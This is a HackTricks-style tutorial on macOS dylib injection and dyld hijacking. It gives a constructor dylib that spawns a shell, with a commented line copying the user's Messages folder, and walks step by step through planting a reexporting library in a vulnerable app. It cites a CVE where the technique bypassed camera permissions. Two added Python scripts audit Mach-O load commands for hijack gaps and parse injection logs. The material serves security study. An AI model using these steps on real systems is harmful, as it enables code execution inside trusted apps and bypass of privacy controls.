macOS Dyld Hijacking & DYLD_INSERT_LIBRARIES


tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

DYLD_INSERT_LIBRARIES basic example

Library to inject in order to execute a shell:

c
// gcc -dynamiclib -o inject.dylib inject.c

#include <syslog.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

// Runs automatically when dyld loads the library, before the target's main()
__attribute__((constructor))
void myconstructor(int argc, const char **argv)
{
    syslog(LOG_ERR, "[+] dylib injected in %s\n", argv[0]);
    printf("[+] dylib injected in %s\n", argv[0]);
    execv("/bin/bash", 0); // replaces the process image with a shell
    //system("cp -r ~/Library/Messages/ /tmp/Messages/");
}

Binary to attack:

c
// gcc hello.c -o hello
#include <stdio.h>

int main()
{
    printf("Hello, World!\n");
    return 0;
}

Injection:

bash
DYLD_INSERT_LIBRARIES=inject.dylib ./hello

Dyld Hijacking example

The targeted binary is /Applications/VulnDyld.app/Contents/Resources/lib/binary.

bash
codesign -dv --entitlements :- "/Applications/VulnDyld.app/Contents/Resources/lib/binary"
[...]com.apple.security.cs.disable-library-validation[...]

From the previous information we know that it doesn't check the signature of the loaded libraries and it tries to load the library from:

  • /Applications/VulnDyld.app/Contents/Resources/lib/lib.dylib
  • /Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib

However, the first one doesn't exist:

bash
pwd
/Applications/VulnDyld.app

find ./ -name lib.dylib
./Contents/Resources/lib2/lib.dylib

So, it's possible to hijack it! Create a library that executes some arbitrary code and exports the same functionality as the legitimate library by reexporting it. And remember to compile it with the expected versions:

lib.m
#import <Foundation/Foundation.h>

__attribute__((constructor))
void custom(int argc, const char **argv) {
    NSLog(@"[+] dylib hijacked in %s", argv[0]);
}

Compile it:

bash
gcc -dynamiclib -current_version 1.0 -compatibility_version 1.0 -framework Foundation /tmp/lib.m -Wl,-reexport_library,"/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib" -o "/tmp/lib.dylib"
# Note the versions and the reexport

The reexport path created in the library is relative to the loader, so let's change it to the absolute path of the library being reexported:

bash
#Check relative
otool -l /tmp/lib.dylib| grep REEXPORT -A 2
cmd LC_REEXPORT_DYLIB
cmdsize 48
name @rpath/libjli.dylib (offset 24)

#Change the location of the library from relative to absolute path
install_name_tool -change @rpath/lib.dylib "/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib" /tmp/lib.dylib

# Check again
otool -l /tmp/lib.dylib| grep REEXPORT -A 2
cmd LC_REEXPORT_DYLIB
cmdsize 128
name /Applications/Burp Suite Professional.app/Contents/Resources/jre.bundle/Contents/Home/lib/libjli.dylib (offset 24)
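The search order that makes this hijack possible (an @rpath dependency whose first LC_RPATH candidate does not exist) and the LC_REEXPORT_DYLIB / LC_RPATH entries that otool -l prints above are both just load commands in the Mach-O header, so a defender can audit a binary for the gap without running it. The following script is an added example written for this page, not HackTricks or Apple code: it builds a constructed little-endian 64-bit Mach-O header in memory that mirrors the VulnDyld binary (two LC_RPATH entries, one @rpath/lib.dylib dependency), parses the load commands, and reports every candidate path dyld would try before the first one that exists. All names (parse_load_commands, find_hijackable, build_sample_binary), the sample paths and the "files on disk" set are assumptions made here; @loader_path is treated the same as @executable_path, which holds for a main executable but not for a dependency of a dylib, and fat/universal binaries are not handled.

```python
"""Audit Mach-O load commands for dyld @rpath hijack gaps (added example, not HackTricks code)."""
import posixpath
import struct
from dataclasses import dataclass
from typing import Callable, Dict, List

MH_MAGIC_64 = 0xFEEDFACF
CPU_TYPE_ARM64 = 0x0100000C
MH_EXECUTE = 2
LC_REQ_DYLD = 0x80000000
LC_LOAD_DYLIB = 0x0C
LC_ID_DYLIB = 0x0D
LC_LOAD_WEAK_DYLIB = 0x18 | LC_REQ_DYLD
LC_RPATH = 0x1C | LC_REQ_DYLD
LC_REEXPORT_DYLIB = 0x1F | LC_REQ_DYLD
DYLIB_CMDS = {
    LC_LOAD_DYLIB: "LC_LOAD_DYLIB",
    LC_ID_DYLIB: "LC_ID_DYLIB",
    LC_LOAD_WEAK_DYLIB: "LC_LOAD_WEAK_DYLIB",
    LC_REEXPORT_DYLIB: "LC_REEXPORT_DYLIB",
}


@dataclass
class LoadCommand:
    kind: str
    path: str
    compat_version: str = ""  # "major.minor.patch", only set for dylib commands


def _version(packed: int) -> str:
    # Mach-O packs versions as 0xMMMMmmpp (16-bit major, 8-bit minor, 8-bit patch)
    return f"{packed >> 16}.{(packed >> 8) & 0xFF}.{packed & 0xFF}"


def _cstring(data: bytes, start: int, end: int) -> str:
    return data[start:end].split(b"\0", 1)[0].decode()


def parse_load_commands(data: bytes) -> List[LoadCommand]:
    """Walk the load-command table of a thin little-endian 64-bit Mach-O image."""
    magic, _, _, _, ncmds, sizeofcmds, _, _ = struct.unpack_from("<8I", data, 0)
    if magic != MH_MAGIC_64:
        raise ValueError("not a little-endian 64-bit Mach-O")
    cmds, off, end = [], 32, 32 + sizeofcmds
    for _ in range(ncmds):
        cmd, cmdsize = struct.unpack_from("<II", data, off)
        if cmdsize < 8 or off + cmdsize > end:  # malformed table: never read past it
            raise ValueError("truncated load command")
        if cmd in DYLIB_CMDS:
            name_off, _ts, _cur, compat = struct.unpack_from("<4I", data, off + 8)
            name = _cstring(data, off + name_off, off + cmdsize)
            cmds.append(LoadCommand(DYLIB_CMDS[cmd], name, _version(compat)))
        elif cmd == LC_RPATH:
            (path_off,) = struct.unpack_from("<I", data, off + 8)
            cmds.append(LoadCommand("LC_RPATH", _cstring(data, off + path_off, off + cmdsize)))
        off += cmdsize
    return cmds


def find_hijackable(cmds: List[LoadCommand], exe_path: str,
                    exists: Callable[[str], bool]) -> Dict[str, List[str]]:
    """For each @rpath/ dependency, list the candidates dyld tries before the first
    existing one. A writable directory in that list is a hijack location."""
    exe_dir = posixpath.dirname(exe_path)
    # Assumption: the audited image is the main executable, so @loader_path == @executable_path
    rpaths = [c.path.replace("@executable_path", exe_dir).replace("@loader_path", exe_dir)
              for c in cmds if c.kind == "LC_RPATH"]
    report: Dict[str, List[str]] = {}
    for c in cmds:
        if c.kind in ("LC_LOAD_DYLIB", "LC_LOAD_WEAK_DYLIB", "LC_REEXPORT_DYLIB") \
                and c.path.startswith("@rpath/"):
            missing = []
            for rp in rpaths:  # LC_RPATH entries are searched in the order they appear
                cand = posixpath.normpath(posixpath.join(rp, c.path[len("@rpath/"):]))
                if exists(cand):
                    break
                missing.append(cand)
            report[c.path] = missing
    return report


# --- constructed sample: an in-memory Mach-O header shaped like the VulnDyld binary ---
def _cmd(cmd: int, head: bytes, text: str) -> bytes:
    body = text.encode() + b"\0"
    body += b"\0" * (-(8 + len(head) + len(body)) % 8)  # cmdsize must be 8-byte aligned
    return struct.pack("<II", cmd, 8 + len(head) + len(body)) + head + body


def _dylib_cmd(cmd: int, name: str, version: int = 0x10000) -> bytes:
    # dylib struct: name offset (24), timestamp, current_version, compatibility_version
    return _cmd(cmd, struct.pack("<4I", 24, 2, version, version), name)


def _rpath_cmd(path: str) -> bytes:
    return _cmd(LC_RPATH, struct.pack("<I", 12), path)  # path string starts at offset 12


def build_sample_binary() -> bytes:
    cmds = [_rpath_cmd("@loader_path"), _rpath_cmd("@loader_path/../lib2"),
            _dylib_cmd(LC_LOAD_DYLIB, "/usr/lib/libSystem.B.dylib"),
            _dylib_cmd(LC_LOAD_DYLIB, "@rpath/lib.dylib")]
    table = b"".join(cmds)
    return struct.pack("<8I", MH_MAGIC_64, CPU_TYPE_ARM64, 0, MH_EXECUTE,
                       len(cmds), len(table), 0, 0) + table


APP = "/Applications/VulnDyld.app/Contents/Resources"
SAMPLE_EXE = APP + "/lib/binary"
SAMPLE_DISK = {APP + "/lib2/lib.dylib", "/usr/lib/libSystem.B.dylib"}  # constructed: lib/lib.dylib absent


def audit_sample() -> Dict[str, List[str]]:
    return find_hijackable(parse_load_commands(build_sample_binary()), SAMPLE_EXE, SAMPLE_DISK.__contains__)


if __name__ == "__main__":
    for dep, missing in audit_sample().items():
        print(dep, "-> hijackable via", missing if missing else "nothing (first candidate exists)")
```

On a real system you would pass the file bytes of the binary and `os.path.exists` instead of the constructed header and set; the report for the sample is `{"@rpath/lib.dylib": [".../lib/lib.dylib"]}`, i.e. exactly the missing first candidate the text above found with `find`.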

Finally copy it to the hijacked location:

bash
cp lib.dylib "/Applications/VulnDyld.app/Contents/Resources/lib/lib.dylib"

And execute the binary and check the library was loaded:

bash
"/Applications/VulnDyld.app/Contents/Resources/lib/binary"
2023-05-15 15:20:36.677 binary[78809:21797902] [+] dylib hijacked in /Applications/VulnDyld.app/Contents/Resources/lib/binary
Usage: [...]

note

A good writeup about how this vulnerability was abused to take over the camera permissions of Telegram can be found at https://danrevah.github.io/2023/05/15/CVE-2023-26818-Bypass-TCC-with-Telegram/

Bigger Scale

If you are planning on trying to inject libraries in unexpected binaries you could check the event messages to find out when the library is loaded inside a process (in this case remove the printf and the /bin/bash execution).

bash
sudo log stream --style syslog --predicate 'eventMessage CONTAINS[c] "[+] dylib"'
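The same "[+] dylib ..." marker can be turned into a small detection once the log stream is saved to a file: the added example below (written for this page, not HackTricks code) parses lines in the NSLog layout shown earlier, ignores unrelated messages, and counts loads per process and path so a library that appears in a binary you did not expect stands out. The sample lines are constructed here; the real `log stream --style syslog` output carries extra fields between the timestamp and the process name, which is why the regexes search for the `proc[pid:tid]` token and the marker independently instead of anchoring the whole line. Function names are assumptions.

```python
"""Group '[+] dylib injected/hijacked in <path>' log lines by process (added example)."""
import re
from collections import Counter
from typing import Dict, List, Tuple

# "<process>[<pid>:<tid>]" as printed by NSLog / log stream --style syslog
PROC_RE = re.compile(r"(?P<proc>[^\s\[\]]+)\[(?P<pid>\d+):\d+\]")
# the marker the constructors on this page emit
MARK_RE = re.compile(r"\[\+\] dylib (?P<how>injected|hijacked) in (?P<path>/\S+)")

# constructed sample log; the kernel line is noise that must be ignored
SAMPLE_LOG = """\
2023-05-15 15:20:36.677 binary[78809:21797902] [+] dylib hijacked in /Applications/VulnDyld.app/Contents/Resources/lib/binary
2023-05-15 15:20:40.001 hello[78820:21798100] [+] dylib injected in /tmp/hello
2023-05-15 15:20:41.120 kernel[0:100] unrelated message that must be ignored
2023-05-15 15:21:02.555 binary[78901:21799001] [+] dylib hijacked in /Applications/VulnDyld.app/Contents/Resources/lib/binary
"""

Event = Tuple[str, int, str, str]  # (process, pid, injected|hijacked, path)


def parse_injection_events(text: str) -> List[Event]:
    """Return one event per line that carries both a proc[pid:tid] token and the marker."""
    events: List[Event] = []
    for line in text.splitlines():
        proc, mark = PROC_RE.search(line), MARK_RE.search(line)
        if proc and mark:
            events.append((proc["proc"], int(proc["pid"]), mark["how"], mark["path"]))
    return events


def summarize(events: List[Event]) -> Dict[Tuple[str, str, str], int]:
    """Collapse repeated launches: count per (process, how, path) so unexpected hosts are easy to spot."""
    return dict(Counter((proc, how, path) for proc, _pid, how, path in events))


if __name__ == "__main__":
    for (proc, how, path), n in summarize(parse_injection_events(SAMPLE_LOG)).items():
        print(f"{proc:<10} {how:<9} x{n}  {path}")
```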
